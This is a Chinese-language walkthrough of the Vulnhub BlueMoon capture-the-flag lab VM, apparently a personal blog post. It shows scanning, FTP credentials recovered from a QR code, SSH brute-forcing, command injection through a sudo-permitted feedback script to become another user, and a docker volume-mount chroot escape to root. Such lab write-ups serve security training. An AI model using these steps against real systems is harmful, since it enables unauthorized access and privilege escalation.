Vulnhub-BlueMoon: 2021

地址

1
https://download.vulnhub.com/bluemoon/bluemoon.ova

image-20260121115415239

打开靶机,先进行扫描,发现

image-20260121115909038

去访问,同时使用

1
2
3
4
nmap 10.103.207.184扫描端口
dirsearch -u  http://10.103.207.184/
gobuster dir -u http://10.103.207.184/ -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,html,txt -s 200,301,302 --status-codes-blacklist ""
feroxbuster -u http://10.103.207.184/ 扫描80端口下面的文件信息

去进行扫描

发现

1
http://10.103.207.184/hidden_text

网站下面有给功能点

1
http://10.103.207.184/.QR_C0d3.png

发现是二维码,当然是发给我的号朋友让他们去扫然后发给我啦,算了

1
https://cli.im/deqr/other

通过上面的在线二维码识别网站去识别

1
#!/bin/bash HOST=ip USER=userftp PASSWORD=ftpp@ssword ftp -inv $HOST user $USER $PASSWORD bye EOF

发现ftp的信息,去进入并且下载

1
2
3
4
5
6
7
8
9
ftp> get  information.txt
local: information.txt remote: information.txt
229 Entering Extended Passive Mode (|||14150|)
150 Opening BINARY mode data connection for information.txt (147 bytes).
100% |*************************************************************************************************|   147       51.82 KiB/s    00:00 ETA
226 Transfer complete.
147 bytes received in 00:00 (44.29 KiB/s)
ftp> get  p_lists.txt
local: p_lists.txt remote: p_lists.txt

下载未完成时候给了提示,直接去爆破

image-20260121120551294

拿下账号和密码,远程ssh连接

image-20260121120748148

成功登录,sudo进行提权

1
2
3
4
5
6
7
8
9
10
11
12
13
robin@BlueMoon:~$ cat /home/robin/project/feedback.sh
#!/bin/bash

clear
echo -e "Script For FeedBack\n"

read -p "Enter Your Name : " name
echo ""
read -p "Enter You FeedBack About This Target Machine : " feedback
echo ""
$feedback 2>/dev/null

echo -e "\nThanks For Your FeedBack...!\n"

发现他会把我们可以去控制的参数传$feedback 2>/dev/null ,直接/bin/bash

1
/bin/bash 2>/dev/null 直接进行命令执行
1
sudo -u  jerry /home/robin/project/feedback.sh

通过去执行这个命令,

image-20260121121340717

横向越权(嗯,应该可以这样说),

1
2
/usr/bin/script -qc /bin/bash /dev/null
维持shell

发现什么了,权限组里面有docker,尝试使用docker就行提权

1
https://gtfobins.org/
1
docker run -v /:/mnt --rm -it alpine chroot /mnt sh //因为没有s权限,就没有加sudo

image-20260121121615333

拿下root